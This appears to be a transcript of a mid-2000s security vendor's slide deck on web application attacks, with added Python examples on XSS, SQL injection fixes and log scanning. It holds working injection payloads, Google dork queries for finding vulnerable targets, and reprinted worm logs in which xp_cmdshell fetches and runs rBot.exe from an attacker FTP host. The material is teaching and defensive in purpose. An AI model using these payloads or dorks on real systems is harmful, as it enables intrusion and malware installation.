Title: The Hacking Evolution: New Trends in Web Application Exploits and Vulnerabilities Brian Christian, S
1. The Hacking Evolution: New Trends in Web Application Exploits and Vulnerabilities
Brian Christian, Senior Security Engineer and Co-Founder, SPI Dynamics
2. Agenda
- Part 1: Introduction. How on earth did we get to this point?
- Part 2: Identifying the Problem. How does this stuff happen?
- Part 3: Key Application Vulnerabilities. Past, present and future
- Part 4: Fixing the Problem. Detecting application vulnerabilities and implementing a secure coding process
- Part 5: More information and online resources
- Part 6: Q&A
3. Part One
- Who We Are: SPI Dynamics in a nutshell
- Application Security: How did we get to this point?
4. SPI Dynamics
The Leader in Web Application Security Assessment
- We manufacture and license WebInspect, our industry-leading web application security assessment product, to enterprises, consultants, and other institutions, both directly and via global partners.
- We own the world's leading database of web application security vulnerabilities, SecureBase. SecureBase is updated frequently by SPI Labs, our U.S.-based research and development organization.
5. Web Sites
Simple, single-server solutions. (Diagram: a browser talking to one web server.)
6. Web Applications
Very complex architectures, multiple platforms, multiple protocols. (Diagram, tiers from the client inward:)
- Clients: Browser, Wireless
- Web Servers: Presentation Layer, Media Store
- Application Server: Business Logic, Content Services
- Web Services
- Database Server: Customer Identification, Access Controls, Transaction Information, Core Business Data
7. Common Web Applications
8. The Absolute Truth
- All code has bugs, regardless of platform, language or application.
- From Microsoft to a Mom and Pop's home-brewed application, all code has bugs.
- Some bugs are functionality bugs, which are discovered by QA.
- Other bugs are security bugs, which largely go unidentified.
- As long as functionality is the main objective and not security, there will always be vulnerabilities in computer applications.
9. Why These Things Happen
This is all the stuff that your application is supposed to do.
10. Why Web Application Attacks Occur
The Web Application Security Gap
Application Developers and QA Professionals Don't Know Security
Security Professionals Don't Know the Applications
"As a Network Security Professional, I don't know how my company's web applications are supposed to work, so I deploy a protective solution but don't know if it's protecting what it's supposed to."
"As an Application Developer, I can build great features and functions while meeting deadlines, but I don't know how to develop my web application with security in mind."
11. Web Applications Breach the Perimeter
(Diagram: traffic flow from the Internet through the DMZ to the corporate inside. Of the protocols shown at the Internet edge, IMAP, SSH, POP3, FTP and TELNET are stopped; HTTP passes.)
- INTERNET: Firewall only allows port 80 (or 443 SSL) traffic from the Internet to the web server. Any web server, port 80.
- DMZ: Web Server. Firewall only allows applications on the web server to talk to the application server.
- TRUSTED INSIDE: Application Server. Firewall only allows the application server to talk to the database server.
- CORPORATE INSIDE: Database.
12. Web Applications Invite Public Access
"Today over 70% of attacks against a company's website or web application come at the Application Layer, not the network or system layer."
- Gartner Group
13. Web Application Risk
Web application incidents cost companies more than $320,000,000 in 2001.
"Forty-four percent (223 respondents) to the 2002 Computer Crime and Security Survey were willing and/or able to quantify their financial losses. These 223 respondents reported $455,848,000 in financial losses."
- 2002 Computer Crime and Security Survey, Computer Security Institute / San Francisco FBI Computer Intrusion Squad
14. Part Two
- What are the primary vulnerabilities?
- How and why they occur
15. Web Application Vulnerabilities
Web application vulnerabilities occur in multiple areas.
- Application: Parameter Manipulation, Cross-Site Scripting, SQL Injection, Buffer Overflow, Reverse Directory Traversal, Java Decompilation, Path Truncation, Hidden Web Paths, Cookie Manipulation, Application Mapping, Backup Checking, Directory Enumeration
- Administration: Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing
- Platform: Known Vulnerabilities
16. Cross Site Scripting
17. Cross Site Scripting (XSS)
- Cross-site scripting (also known as XSS or CSS) occurs when dynamically generated web pages display input that is not properly validated.
- A user passes input in the form of a parameter to the web server.
- The web server returns the user-provided input back to the user without proper encoding.
- Again, a demonstration!
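The three bullets above describe reflected XSS end to end: a parameter goes in, the server echoes it, and nothing encodes it on the way out. The following is an added example, not code from the deck or from SPI Dynamics; the host name example.test, the page layout and the payloads are all constructed for illustration. It renders the same page twice, once reflecting the parameter as-is and once with output encoding, and shows why the encoding has to cover the attribute context as well as the text context.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests (host and payloads are made up for this example).
BENIGN_URL = "http://example.test/search?q=shoes"
# Classic reflected payload: <script>alert(document.cookie)</script>
XSS_URL = "http://example.test/search?q=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E"
# Payload that breaks out of a quoted attribute: "><script>alert(1)</script>
ATTR_URL = "http://example.test/search?q=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"


def query_param(url: str, name: str) -> str:
    """Return the first value of a query-string parameter, URL-decoded ("" if absent)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(url: str) -> str:
    """Reflect the parameter straight into the page: the flaw the slide describes."""
    q = query_param(url, "q")
    return f'<h1>Results for: {q}</h1>\n<input name="q" value="{q}">'


def render_fixed(url: str) -> str:
    """Same page with output encoding.

    html.escape(quote=True) turns & < > " ' into entities, so the browser
    shows the input as text in the <h1> and cannot break out of the quoted
    value attribute either.
    """
    q = html.escape(query_param(url, "q"), quote=True)
    return f'<h1>Results for: {q}</h1>\n<input name="q" value="{q}">'


def contains_live_script(page: str) -> bool:
    """Crude check: is there an unencoded <script> tag anywhere in the response?"""
    return "<script" in page.lower()
```

Encoding on output is the fix the slide points at ("without proper encoding"); input validation alone does not help here because a search term legitimately may contain quotes and angle brackets. Note that html.escape without quote=True would leave the attribute breakout in ATTR_URL working, which is why the example always passes quote=True.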
18. SQL Injection
19. SQL Injection Defined
- SQL injection is a technique for exploiting web applications that use client-supplied data in SQL queries without stripping potentially harmful characters first.
- Allow me to demonstrate!
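The definition above is the whole mechanism: client data is pasted into query text, so the data can change the query. The following is an added example, not the demonstration from the deck; it uses an in-memory SQLite table with made-up users. It shows a login check written the vulnerable way, the two classic bypasses (commenting out the password clause, and a tautology), and the same check with bound parameters. Note that the fix is parameter binding rather than stripping characters, which is easy to get wrong; also note that SQLite refuses stacked statements, whereas the Microsoft SQL Server attack shown later in this deck relies on `;` to append `exec master..xp_cmdshell`, so the impact on a real MS SQL back end is far larger than a login bypass.

```python
import sqlite3

# Constructed users table; credentials are made up for this example.
SEED_USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db() -> sqlite3.Connection:
    """Create the in-memory table the two login functions query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SEED_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Client-supplied data pasted into the query text: the flaw the slide defines.

    Returns the matched username, or None when the credentials do not match.
    """
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn: sqlite3.Connection, username: str, password: str):
    """Same check with bound parameters: the driver never lets data become SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Run both versions against the two classic payloads and valid credentials."""
    conn = make_db()
    comment_out = "alice' --"   # closes the string, comments out the password check
    tautology = "' OR '1'='1"   # makes the WHERE clause true for every row
    return {
        "vuln_comment": login_vulnerable(conn, comment_out, "wrong"),
        "vuln_tautology": login_vulnerable(conn, "nobody", tautology),
        "fixed_comment": login_fixed(conn, comment_out, "wrong"),
        "fixed_tautology": login_fixed(conn, "nobody", tautology),
        "fixed_valid": login_fixed(conn, "bob", "hunter2"),
    }
```

With the vulnerable function the query becomes `... WHERE username = 'alice' --' AND password = 'wrong'`, and everything after `--` is a comment, so alice is logged in without a password; the tautology version returns the first row of the table. The parameterized version returns None for both payloads, because the quote and the `--` are just characters inside a bound string.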
20. Part Three
- Key Application Vulnerabilities
- Past, Present and Future
- Google Hacking
21. Google Hacking
- More than searching for great pr0n.
22. Google Hacking
- Find vulnerable sites using Google (old method, new life)
- Example search queries:
  - filetype:mdb inurl:admin (180 results)
  - filetype:xls inurl:admin (14,100 results)
  - "ORA-00921: unexpected end of SQL command" (3,470 results)
  - allintitle:"Netscape Enterprise Server Home Page" (431 results)
23. Google Hacking
- Take this method a step further and use it to narrow your attack victims.
  - inurl:id filetype:asp site:gov (572,000 results)
  - inurl:id filetype:asp site:com (7,150,000 results)
  - inurl:id filetype:asp site:org (3,240,000 results)
- Use this list as a baseline for identifying SQL injection vulnerabilities
25. Google Hacking
- Took 1 hour of coding
- 500 vulnerable sites were found in 1 minute and 26 seconds
26. Google Hacking
(Diagram: a loop. Find next victim, exploit victim, exploit victim, and back to the search.)
27. The Past, the Present, and the Future of Hacking
- How prolific could this whole scenario be?
28. Where We've Been: The Past
- Since most sites were static HTML, there was not much to do but try to obtain root / admin privileges on the machine or deface the website.
- This proved to be great comedy.
29. Where We're At: The Present
- Since more dynamic and unique content has been added to websites, and users demand even MORE functionality so that they can do everything electronically, insecure content was added at an expedited pace!
- And users and management demand even more!
30. Where We're Going: The Future
- Application hacking is becoming more complex as applications are becoming more complex. The possibilities are endless when it comes down to what you can exploit in web applications.
- Take for instance Application Worms: Web Application Worms.
31. Enter the Santy Worm
- Perl.Santy is a worm written in Perl that attempts to spread to web servers running versions of the phpBB 2.x bulletin board software exposed to the viewtopic.php PHP Script Injection Vulnerability. Other systems are not affected.
- If successful, the worm copies itself to the server and overwrites files with the following extensions: .asp, .htm, .jsp, .php, .phtm, .shtm
- The worm uses the Google search engine to find potential new infection targets. Google has now implemented blocking of Perl.Santy search requests, which is expected to greatly reduce the worm's ability to propagate and lower the risk of further infections.
32. Enter the Santy Worm
- Aliases: Perl.Santy.A (Computer Associates), Santy (F-Secure), Net-Worm.Perl.Santy.a (Kaspersky), Perl/Santy.worm (McAfee), PHP/Santy.A.worm (Panda), Perl/Santy-A (Sophos), WORM_SANTY.A (Trend Micro)
- Platforms listed as affected: UNIX, Linux, Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
33. But There Are Even Worse Worms
- New evidence suggests that a new worm has been discovered in the wild that takes advantage of SQL Injection vulnerabilities.
- A Jan 5th post on seclists.org by Maxime Ducharme describes an attack made on his company's machines where a hybrid worm (a cross between Santy and Randex) was identified in his logs.
34. The Google query used to find targets, allinurl:"viewtopic.php":
http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=allinurl%3A%22viewtopic.php%22
35. Log Entries
Each entry is SQL that reached Microsoft SQL Server through the web application; xp_cmdshell hands the quoted string to the operating system. The sequence writes an FTP script line by line, fetches rBot.exe from the attacker's FTP server, deletes the script and runs the bot.
- exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\'
- exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd'
- exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >> %systemroot%\system32\macromed\lolx\blah.jkd'
- exec MASTER..xp_cmdshell 'echo get rBot.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> %systemroot%\system32\Macromed\lolx\blah.jkd'
- exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd'
- exec MASTER..xp_cmdshell 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd'
- exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd'
- exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe'
36. Even Hits Close to Home
- Our R&D researcher Bob Auger, who runs CGISECURITY.NET, found suspicious entries in his logs.
- He was running FreeBSD.
- So like all good site operators he followed them back to the IRC channel that they were using to control the worm.
- He was unable to follow them after the 3rd hop they made to control the worm.
37. Fact or Fiction? FACT!
- Web Application Worms are the new emerging threat.
- We are beginning to see the first generation of these emerging threats.
- Current anti-virus solutions are reactive, not proactive.
- Worms could be propagating right now, but very few people check their web logs or scan their sites looking for SQL injection.
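The last bullet is the practical takeaway from the log entries on slide 35: the worm's requests are sitting in the web server log of every site it touched, URL-encoded into the query string. The following is an added example, not a tool from the deck or from SPI Dynamics: a small scanner that parses Apache combined-format lines, decodes the request twice (to catch the double encoding used against phpBB's highlight parameter), and flags the indicators this deck shows, namely xp_cmdshell, exec master.., union select, the quote-OR tautology, and a quote inside a viewtopic.php highlight parameter. The sample log lines are constructed for the example and not taken from any real victim; the client addresses, paths and the phpBB payload shape are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines in Apache combined format (made up for this example;
# 203.0.113.7 replays the xp_cmdshell sequence from slide 35, 198.51.100.9 sends a
# Santy-style viewtopic.php request, 192.0.2.4 tries a login tautology, 192.0.2.77 is benign).
SAMPLE_LOG = r"""
203.0.113.7 - - [05/Jan/2005:03:12:44 -0500] "GET /products.asp?id=1;exec%20master..xp_cmdshell%20'mkdir%20%25systemroot%25\system32\Macromed\lolx\' HTTP/1.1" 200 1532
203.0.113.7 - - [05/Jan/2005:03:12:45 -0500] "GET /products.asp?id=1;exec%20master..xp_cmdshell%20'echo%20open%20y.y.y.y%2021%20>>%20%25systemroot%25\system32\Macromed\lolx\blah.jkd' HTTP/1.1" 200 1532
198.51.100.9 - - [05/Jan/2005:04:01:10 -0500] "GET /forum/viewtopic.php?t=1&highlight=%2527.system(chr(119).chr(103)).%2527 HTTP/1.1" 200 8812
192.0.2.4 - - [05/Jan/2005:04:05:00 -0500] "GET /login.asp?user=bob%27%20OR%20%271%27%3D%271&pass=x HTTP/1.1" 200 412
192.0.2.77 - - [05/Jan/2005:04:06:00 -0500] "GET /products.asp?id=42 HTTP/1.1" 200 1532
"""

# client ident user [time] "method target protocol" status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Indicators are matched against the decoded request target. Ordered so that the
# most specific (and least noisy) patterns come first.
INDICATORS = [
    ("xp_cmdshell", re.compile(r"xp_cmdshell", re.I)),
    ("exec master", re.compile(r"exec\s+master\.\.", re.I)),
    ("union select", re.compile(r"union\s+(all\s+)?select", re.I)),
    ("quote-or tautology", re.compile(r"'\s*or\s+'?\w*'?\s*=", re.I)),
    # Assumption: Santy-style phpBB requests carry a quote inside the highlight
    # parameter, double-encoded as %2527 so that one decoding pass leaves %27.
    ("santy highlight", re.compile(r"viewtopic\.php\?.*highlight=.*'", re.I)),
]


def decode_target(target: str) -> str:
    """URL-decode twice so double-encoded payloads (%2527 -> %27 -> ') are visible."""
    return unquote(unquote(target))


def scan_log(text: str) -> list:
    """Return one hit per log line whose request matches at least one indicator."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; a real tool would count these
        decoded = decode_target(m["target"])
        matched = [name for name, rx in INDICATORS if rx.search(decoded)]
        if matched:
            hits.append({
                "client": m["client"],
                "time": m["time"],
                "status": m["status"],
                "target": m["target"],
                "indicators": matched,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["time"], hit["status"], hit["indicators"])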
38. Part Four - Fixing the Problem
- Detecting Application Vulnerabilities
- And Implementing a Secure Coding Process
- Instituting a secure coding process
- How we build the products to make the process work
39. Enterprise-Wide Web Application Security
- Web Application Security testing must be applied in all phases of the Application Lifecycle and by all constituencies throughout the enterprise: Auditors, Application Developers, QA and Security Operations.
40. Enterprise-Wide Web Application Security
- Must have clear-cut security requirements to follow during Development and QA phases
- Need to run automated tests on code during Development phase
- Must utilize secure code for re-use
- Require automated testing products that integrate into current environment
41. Enterprise-Wide Web Application Security
Quality Assurance Professionals
- Must test applications not only for functionality but also for security
- Must test environments for potential flaws and insecurities
- Must provide detailed security flaw reports to development
- Require automated testing products that integrate into current environment
(Diagram on slides 41 to 43: the Web Application Security lifecycle wheel, with its D, Q, A and S segments highlighted for the role each slide addresses.)
42. Enterprise-Wide Web Application Security
Security Auditors and Risk and Compliance Officers
- Help define regulatory requirements during the Definition phase of the Application Lifecycle
- Assess applications once they are in the Production phase to validate compliance
- Must act as a resource for what is and is not acceptable
43. Enterprise-Wide Web Application Security
- Must continually test the application in a real-world environment to assess the impact of ongoing code changes
- Must look for all levels of web vulnerabilities:
  - Platform
  - Informational
  - Application
44. Part Five
- Websites and mailing lists on the net
45. Websites
- SPI Dynamics: www.spidynamics.com
- Web Application Security Consortium: www.webappsec.org
- CGISecurity.net: http://www.cgisecurity.net/
- Open Web Application Security Project: www.owasp.org
- WebAppSec mailing list: SecurityFocus
46. Questions?
47. Contact
SPI Dynamics, Inc., 115 Perimeter Center Place, Suite 1100, Atlanta, GA 30346
For a free WebInspect(TM) 15-day trial download, visit www.spidynamics.com